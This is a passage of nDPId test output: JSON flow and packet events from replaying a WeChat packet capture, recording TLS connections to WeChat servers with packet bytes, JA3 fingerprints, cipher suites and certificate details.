00601{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":488,"source":"wechat.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167449288,"flow_last_seen":1492167449288,"flow_idle_time":600000,"flow_min_l4_payload_len":16,"flow_max_l4_payload_len":16,"flow_tot_l4_payload_len":16,"flow_avg_l4_payload_len":16,"midstream":0,"thread_ts_msec":1492167449288,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.22","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":491,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167452759,"flow_last_seen":1492167452759,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167452759,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54099,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":491,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1492167452759,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167452759,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8XuFAAEAGtlvAqAFny82XotNTAbtWrkW6AAAAAKACchAjbQAAAgQFtAQCCAoAMRtbAAAAAAEDAwc="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":493,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167453010,"flow_last_seen":1492167453010,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167453010,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54100,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":493,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":1,"flow_last_seen":1492167453010,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167453010,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8DstAAEAGBnLAqAFny82XotNUAbuiFhVRAAAAAKACchAILgAAAgQFtAQCCAoAMRuaAAAAAAEDAwc="} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":494,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1492167453125,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167453125,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC0GJ53LzZeiwKgBZwG701NWIPBqVq5Fu6ASN8jLwAAAAgQFoAQCCApF0gWaADEbWwEDAwc="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":495,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1492167453125,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167453125,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0XuJAAEAGtmLAqAFny82XotNTAbtWrkW7ViDwa4AQAOUxAAAAAQEICgAxG7dF0gWa"} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":496,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167452759,"flow_last_seen":1492167453126,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167453126,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54099,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":497,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":2,"flow_last_seen":1492167453357,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167453357,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC4GJp3LzZeiwKgBZwG701Rfi5PhohYVUqASN8gDZQAAAgQFoAQCCApF0gXVADEbmgEDAwc="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":498,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_packet_id":3,"flow_last_seen":1492167453357,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167453357,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0DsxAAEAGBnnAqAFny82XotNUAbuiFhVSX4uT4oAQAOVoqQAAAQEICgAxG\/FF0gXV"} -00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":500,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167452759,"flow_last_seen":1492167453494,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167453494,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54099,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":502,"source":"wechat.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167452759,"flow_last_seen":1492167453503,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1492167453503,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54099,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":513,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167453010,"flow_last_seen":1492167454373,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167454373,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54100,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":515,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167454457,"flow_last_seen":1492167454457,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167454457,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54101,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":515,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1492167454457,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167454457,"pkt":"8IQvSpdgeJKcD6iOCABFAAA86XpAAEAGK8LAqAFny82XotNVAbue7PR+AAAAAKACchAqvwAAAgQFtAQCCAoAMR0EAAAAAAEDAwc="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":516,"source":"wechat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167454458,"flow_last_seen":1492167454458,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167454458,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54102,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":516,"source":"wechat.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1492167454458,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167454458,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8cSZAAEAGpBbAqAFny82XotNWAbsdO2wiAAAAAKACchA0zAAAAgQFtAQCCAoAMR0EAAAAAAEDAwc="} -00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":521,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167453010,"flow_last_seen":1492167454734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":208,"midstream":0,"thread_ts_msec":1492167454734,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54100,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01435{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":523,"source":"wechat.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1492167453010,"flow_last_seen":1492167454734,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":335,"midstream":0,"thread_ts_msec":1492167454734,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54100,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":530,"source":"wechat.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":2,"flow_last_seen":1492167454801,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167454801,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG701bGHEoeHTtsI6ASN8gRwgAAAgQFoAQCCApF0gdIADEdBAEDAwc="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":531,"source":"wechat.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":3,"flow_last_seen":1492167454802,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167454802,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0cSdAAEAGpB3AqAFny82XotNWAbsdO2wjxhxKH4AQAOV3BwAAAQEICgAxHVpF0gdI"} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":532,"source":"wechat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167454458,"flow_last_seen":1492167454802,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167454802,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54102,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":536,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167454818,"flow_last_seen":1492167454818,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167454818,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54103,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":536,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1492167454818,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167454818,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8NuJAAEAG3lrAqAFny82XotNXAbvn9Cu8AAAAAKACchCqHQAAAgQFtAQCCAoAMR1eAAAAAAEDAwc="} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":537,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":2,"flow_last_seen":1492167454836,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167454836,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAAC4GJp3LzZeiwKgBZwG701XgAvN\/nuz0f6ASN8ip9gAAAgQFoAQCCApFraHjADEdBAEDAwc="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":538,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1492167454836,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167454836,"pkt":"8IQvSpdgeJKcD6iOCABFAAA06XtAAEAGK8nAqAFny82XotNVAbue7PR\/4ALzgIAQAOUPMwAAAQEICgAxHWNFraHj"} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":539,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167454457,"flow_last_seen":1492167454837,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167454837,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54101,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":544,"source":"wechat.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167454458,"flow_last_seen":1492167455179,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3116,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":559,"midstream":0,"thread_ts_msec":1492167455179,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54102,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":546,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1492167455179,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167455179,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8AABAACwGKJ3LzZeiwKgBZwG701d\/O17O5\/QrvaASN8geewAAAgQFoAQCCApFraI2ADEdXgEDAwc="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":547,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1492167455179,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167455179,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0NuNAAEAG3mHAqAFny82XotNXAbvn9Cu9fztez4AQAOWDvAAAAQEICgAxHbhFraI2"} -00843{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":550,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167454818,"flow_last_seen":1492167455180,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":238,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1492167455180,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54103,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":558,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167454457,"flow_last_seen":1492167455193,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167455193,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54101,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":560,"source":"wechat.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167454457,"flow_last_seen":1492167455196,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1688,"flow_tot_l4_payload_len":3354,"flow_avg_l4_payload_len":419,"midstream":0,"thread_ts_msec":1492167455196,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54101,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} -00900{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":567,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167454818,"flow_last_seen":1492167455501,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1666,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":1492167455501,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54103,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01434{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":569,"source":"wechat.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1492167454818,"flow_last_seen":1492167455502,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":3094,"flow_avg_l4_payload_len":386,"midstream":0,"thread_ts_msec":1492167455502,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"203.205.151.162","src_port":54103,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.WeChat","breed":"Fun","category":"Chat"},"tls": {"version":"TLSv1.2","client_requested_server_name":"web.wechat.com","server_names":"webpush1.wechat.com,webpush.wechat.com,login.web.wechat.com,webpush.web.wechat.com,webpush2.wechat.com,webpush.web2.wechat.com,file.web2.wechat.com,web1.wechat.com,file.web.wechat.com,loginpoll.wechat.com,web2.wechat.com,login.wechat.com,login.web2.wechat.com,res.wechat.com,web.wechat.com","ja3":"e330bca99c8a5256ae126a55c4c725c5","ja3s":"699a80bdb17efe157c861f92c5bf5d1d","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=GeoTrust Inc., CN=GeoTrust SSL CA - G3","subjectDN":"C=HK, ST=HongKong, L=Wan Chai, O=Tencent Mobility Limited, CN=web.wechat.com","alpn":"h2,http\/1.1","fingerprint":"4F:3B:6A:87:0C:D2:34:09:C9:53:9F:6F:EE:7D:7B:9B:E9:D6:EF:C1"}} 